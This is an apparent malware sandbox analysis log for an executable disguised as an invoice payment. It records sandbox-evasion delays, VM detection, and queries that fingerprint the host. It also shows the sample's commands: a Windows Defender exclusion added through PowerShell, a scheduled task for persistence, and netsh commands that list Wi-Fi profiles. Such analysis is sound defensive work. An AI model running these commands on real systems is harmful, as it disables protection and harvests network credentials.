Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -594141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -594031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7336	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -598882s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -598766s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -598542s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -598422s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -598297s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -598187s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -598078s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -597844s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -597625s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -597515s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -597291s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -597178s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -597046s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -596936s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -596800s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -596672s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -596562s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -596453s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -596344s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -596219s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -596109s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -596000s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -595890s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -595781s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -595672s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -595562s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -595453s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -595344s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -595234s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -595124s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -595015s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -594722s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -594555s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -594444s >= -30000s
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe TID: 7304	Thread sleep time: -594326s >= -30000s

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599433	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599208	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598967	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598856	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598497	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596723	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596345	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596137	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595775	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598882
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598542
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598297
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597291
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597178
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597046
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596936
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596800
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596672
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596562
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596453
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596344
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595890
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595781
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595344
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595124
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 594722
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 594555
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 594444
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 594326

Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4129278755.0000000005830000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]_U
Source: SFHAWxtoIpgL.exe, 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBox
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4132675872.0000000005DE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Code function: 6_2_05B70B20 LdrInitializeThunk,

6_2_05B70B20

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe"
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp73B2.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid

Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
